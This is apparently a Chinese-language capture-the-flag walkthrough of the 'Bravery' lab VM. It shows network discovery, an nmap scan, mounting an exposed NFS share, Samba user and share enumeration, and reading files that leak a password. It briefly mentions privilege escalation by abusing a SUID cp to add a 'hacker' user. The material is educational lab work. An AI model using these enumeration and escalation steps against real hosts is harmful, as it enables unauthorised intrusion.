Bravery
Recon
┌──(kali㉿kali-[~]
└─$ sudo netdiscover -r 192.168.80.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.80.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.80.2 00:50:56:ed:65:ac 1 60 VMware, Inc.
192.168.80.131 00:0c:29:5a:0f:b5 1 60 VMware, Inc.
192.168.80.133 00:0c:29:b9:af:ac 1 60 VMware, Inc.
192.168.80.254 00:50:56:fd:b9:5a 1 60 VMware, Inc.
┌──(kali㉿kali-[~]
└─$ sudo nmap -sS -p- -sV 192.168.80.131
Starting Nmap 7.93 ( https://nmap.org at 2023-04-07 00:49 EDT
Nmap scan report for 192.168.80.131
Host is up (0.0010s latency.
Not shown: 65522 closed tcp ports (reset
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0
53/tcp open domain dnsmasq 2.76
80/tcp open http Apache httpd 2.4.6 ((CentOS OpenSSL/1.0.2k-fips PHP/5.4.16
111/tcp open rpcbind 2-4 (RPC #100000
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS OpenSSL/1.0.2k-fips PHP/5.4.16
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP
2049/tcp open nfs_acl 3 (RPC #100227
3306/tcp open mysql MariaDB (unauthorized
8080/tcp open http nginx 1.12.2
20048/tcp open mountd 1-3 (RPC #100005
37985/tcp open status 1 (RPC #100024
44626/tcp open nlockmgr 1-4 (RPC #100021
MAC Address: 00:0C:29:5A:0F:B5 (VMware
Service Info: Host: BRAVERY
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up scanned in 21.52 seconds
发现目标靶机开启了DNS、HTTP、HTTPS和Samba、NFS等一系列的服务。
Process
┌──(kali㉿kali-[~/Labs/Bravery]
└─$ sudo mount -t nfs 192.168.80.131:/ nfs
┌──(kali㉿kali-[~/…/Bravery/nfs/var/nfsshare]
└─$ ls
discovery enumeration explore itinerary password.txt qwertyuioplkjhgfdsazxcvbnm README.txt
其中的内容,大部分没有什么作用,但是我们关注到一个奇怪的文件(此处埋下伏笔)。
┌──(kali㉿kali-[~/…/Bravery/nfs/var/nfsshare]
└─$ cat qwertyuioplkjhgfdsazxcvbnm
Sometimes, the answer you seek may be right before your very eyes.
NFS中有效的内容不多,此时将我们的目光放到Samba上,目标为Linux机器,要想枚举目标的Samba信息,我们有个得力的工具enum4linux,工具的详细信息。
enum4linux工具的输出,我们能够获得Linux主机上的用户和共享文件夹(下为部分内容)。
======================================( Users on 192.168.80.131 ======================================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: david Name: david Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: rick Name: Desc:
user:[david] rid:[0x3e8]
user:[rick] rid:[0x3e9]
================================( Share Enumeration on 192.168.80.131 ================================
Sharename Type Comment
--------- ---- -------
anonymous Disk
secured Disk
IPC$ IPC IPC Service (Samba Server 4.7.1
我们获得了用户david和rick,以及共享文件夹anonymous和secured。我们首先通过smbclient工具访问共享文件夹anonymous。
┌──(kali㉿kali-[~/Labs/Bravery]
└─$ smbclient //192.168.80.131/anonymous -U %
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Sep 28 09:01:35 2018
.. D 0 Thu Jun 14 12:30:39 2018
patrick's folder D 0 Fri Sep 28 08:38:27 2018
qiu's folder D 0 Fri Sep 28 09:27:20 2018
genevieve's folder D 0 Fri Sep 28 09:08:31 2018
david's folder D 0 Tue Dec 25 21:19:51 2018
kenny's folder D 0 Fri Sep 28 08:52:49 2018
qinyi's folder D 0 Fri Sep 28 08:45:22 2018
sara's folder D 0 Fri Sep 28 09:34:23 2018
readme.txt N 489 Fri Sep 28 09:54:03 2018
17811456 blocks of size 1024. 12839656 blocks available
我们获得了一部分用户和readme.txt,但这些文件夹并没有实际的作用。readme.txt只告诉我们这个samba共享系统可能即将被替换到Sharepoint。那么我们就尝试访问另一个secured文件夹,此时之前埋下的伏笔就起到了作用,它是david账户的密码。在文件夹中我们发现了三个文件。
┌──(kali㉿kali-[~/Labs/Bravery/smbd]
└─$ cat david.txt
I have concerns over how the developers are designing their webpage. The use of "developmentsecretpage" is too long and unwieldy. We should cut short the addresses in our local domain.
1. Reminder to tell Patrick to replace "developmentsecretpage" with "devops".
2. Request the intern to adjust her Favourites to http://<developmentIPandport>/devops/directortestpagev1.php.
david.txt文件也是一个伏笔,不过这个靶机无关。其中最为关键的是genevieve.txt文件。其中有一个url值得我们关注。
┌──(kali㉿kali-[~/Labs/Bravery/smbd]
└─$ cat genevieve.txt
Hi! This is Genevieve!
We are still trying to construct our department's IT infrastructure; it's been proving painful so far.
If you wouldn't mind, please do not subject my site (http://192.168.254.155/genevieve to any load-test as of yet. We're trying to establish quite a few things:
a File-share to our director.
b Setting up our CMS.
c Requesting for a HIDS solution to secure our host.
我们尝试访问它。发现是一个类似CMS的测试页。
Privilege Escalation
通过查找具有粘滞位权限的命令,我们找到了cp这个命令。
需要注意的一点,hacker用户的密码需要自行按照当前系统所使用的密码编码生成,比如CentOS与Ubuntu所使用的hash算法不同,则不能相互识别。